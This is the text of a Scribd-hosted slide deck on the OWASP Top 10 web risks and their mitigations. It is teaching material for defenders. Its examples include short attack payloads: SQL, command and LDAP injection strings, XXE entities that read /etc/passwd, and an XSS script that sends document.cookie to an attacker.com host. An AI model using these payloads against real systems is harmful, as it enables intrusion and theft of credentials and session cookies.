Scribd
Upload
249 views25 pages

OWASP Top 10 Security Guide

The document summarizes the OWASP Top 10 security risks and provides mitigation strategies. It discusses the most common attacks in 2013 and 2017, including injection, broken authentication, sensitive data exposure, XML external entities, broken access control, security misconfiguration, cross-site scripting, insecure deserialization, use of components with known vulnerabilities, and insufficient logging and monitoring. For each risk, it explains how attacks occur and recommends techniques to prevent attacks such as input validation, access controls, encryption, updating software, and logging. The goal is to help organizations protect applications and data from the most critical web application security vulnerabilities.

Uploaded by

Shitesh Sachan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
249 views25 pages

OWASP Top 10 Security Guide

The document summarizes the OWASP Top 10 security risks and provides mitigation strategies. It discusses the most common attacks in 2013 and 2017, including injection, broken authentication, sensitive data exposure, XML external entities, broken access control, security misconfiguration, cross-site scripting, insecure deserialization, use of components with known vulnerabilities, and insufficient logging and monitoring. For each risk, it explains how attacks occur and recommends techniques to prevent attacks such as input validation, access controls, encryption, updating software, and logging. The goal is to help organizations protect applications and data from the most critical web application security vulnerabilities.

Uploaded by

Shitesh Sachan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 25

OWASP TOP 10

ATTACKS AND
MITIGATION

Detox Technologies
OWASP Top 10 - OWASP Top 10 -
2013 2017
1. Injection 1. Injection
2. Broken Authentication and 2. Broken Authentication
Session Management
3. Sensitive Data Exposure
3. Cross-Site Scripting (XSS)
4. XML External Entities (XXE)
4. Insecure Direct Object
References (IDOR) 5. Broken Access Control
5. Security Misconfiguration 6. Security Misconfiguration
6. Sensitive Data Exposure 7. Cross-Site Scripting (XSS)
7. Missing Function Level Access 8. Insecure Deserialization.
Control
9. Using Components with
8. Cross Site Request Forgery Known Vulnerabilities
(CSRF)
10. Insufficient Logging &
9. Using Components with Known
Monitoring
Vulnerabilities
10. Unvalidated Redirects and
Forwards
INJECTION
Any attack of tricking the interpreter at
backend to serve any unauthorized data or
perform any unauthorized action

Command Injection
OS Injection

LDAP Injection

SQL Injection
SQL Injection
EXAMPLES

 String query = "SELECT * FROM accounts WHERE custID='" +


request.getParameter("id") + “’”;
 <?php system(“cat /etc/passwd”) ?>
 Ping 127.0.0.1 | ifconfig
 admin*)((|userpassword=*)
 {"username": {"$ne": null}, "password": {"$ne": null}}
Mitigation

API

PARAMETERIZED QUERY

PREPARED STATEMENTS

WHITELIST CHARACTERS

ENCODING

LENGTH LIMITING
BROKEN AUTHENTICATION• User authentication credentials aren’t
properly protected when stored using
hashing or encryption

• Session IDs are exposed in the URL

• Session IDs aren’t rotated after successful


login

• OTP can be bruteforced

What • Passwords, session IDs, and other


credentials are sent over unencrypted
How
channels
MITIGATIONS

 Strong Password
 Secure Channel
 Properly Implemented MFA
 Server Issued Session ID with High Entropy
 Logical Vulnerabilities to avoid session hijacking
 Avoid XSS
SENSITIVE DATA EXPOSURE
 What is your sensitive data
 How is it stored
 How it is attacked
An application encrypts credit card numbers in a database using
automatic database encryption. However, this data is automatically
decrypted when retrieved, allowing a SQL injection flaw to retrieve
credit card numbers in clear text. Alternatives include not storing
credit card numbers, using tokenization, or using public key
encryption.

The password database uses unsalted hashes to store everyone’s


passwords. A file upload flaw allows an attacker to retrieve the
password data. All of the unsalted hashes can be exposed with a
rainbow table of precalculated hashes.
 Don’t store sensitive data unnecessarily
 Strong Encryption algorithm
 Secure data in transit
 Strong policies in Place

MITIGATIONS
XML EXTERNAL ENTITIES
 What is XXE
 Who can be attacked
 What can XXE Do
<?xml version="1.0" encoding="ISO-8859-
 How to attack 1"?> <!DOCTYPE foo [ <!ELEMENT foo
ANY > <!ENTITY xxe SYSTEM
"file:///etc/passwd" >]>
<foo>&xxe;</foo>

<!ENTITY xxe SYSTEM "https://192.168.1.1/private"


>]>
 Don’t Use XML until Necessary
 Update SOAP to SOAP 1.2
 Disable XML External Entity and DTD processing in parsers
 Whitelisting
 WAF

MITIGATIONS
BROKEN ACCESS CONTROL (BAC)

 What are Access Controls Allowing the primary key to be


changed to another users
 What is BAC record, permitting viewing or
 What can BAC lead to editing someone else's
account.

Elevation of privilege. Acting as a


user without being logged in, or
acting as an admin when logged in as
a user
CORS misconfiguration
Force browsing to authenticated allows unauthorized
pages as an unauthenticated API access.
user or to privileged pages as a
standard user. Accessing API
with missing access controls for
POST, PUT and DELETE
 Deny by default
 Rate limiting
 Minimize CORS usage
 Proper JWT implementation
 Strong Session Cookie

MITIGATIONS
 Unnecessary ports/pages open
 Improper Error Handling
 Lack of security headers
 Outdated versions of technologies/tools/libraries/plugins
 Default accounts and passwords in place
 Logical and business vulnerabilities

SECURITY MISCONFIGURATION
MITIGATION

 Secure Development lifecycle


 Security Hardening
 Automated process/checklist to follow after certain time
intervals
 Security Headers in place
 Updated Technologies
XSS
 Why does XSS occur
 Stored
 Reflected
<img \x00src=x
 DOM onerror="alert(1)">
 Blind
http://example.com/index.
php?
p=<script>alert(0);</scri
pt>
'><script>document.loc
ation='http://www.attack
er.com/cgi-
bin/cookie.cgi?
foo='+document.cookie
</script>'.
 Whitelisting
 Character Encoding
 Content-Security-policy header
 Update outdated versions
 Escaping

MITIGATIONS
INSECURE
DESERIALIZATION

 What is serialization
 What can insecure deserialization do

Create an admin user in


PHP service using
serialization:
a:4:
{i:0;i:1;i:1;s:5:"Alice";i:2;s:5
:"admin";i:3;s:32:"b6a8b3be
a87fe0e05022f8f3c88bc960
";}
 Isolation
 Static Code Analysis
 Whitelist characters
 Actively monitor deserialization

MITIGATIONS
USING COMPONENTS WITH KNOWN
VULNERABILITIES
 Server
 Plugins
 Services
Functions vulnerable to
 Libraries buffer overflow
 Languages
Apache 1.x

Tomcat 7.x

IIS 6.0
SSH 2.x Vulnerable WP
plugins
 Update
 Discard outdated
 Constantly monitor

MITIGATION
INSUFFICIENT LOGGING AND
MONITORING
A major US retailer
reportedly had an internal
malware analysis sandbox
analyzing attachments. The
Logging vs Monitoring sandbox software had
Why is logging Necessary detected potentially
unwanted software, but no
one responded to this
detection. The sandbox had
been producing warnings
An attacker uses scans for users using a for some time before the
common password. They can take over all breach was detected due to
fraudulent card transactions
accounts using this password. For all other
by an external bank.
users, this scan leaves only one false login
behind. After some days, this may be
repeated with a different password.
 Best Practices
 Backups
 IDS/IPS
 Centralized Access

MITIGATIONS
CONCLUSION
THANK YOU

You might also like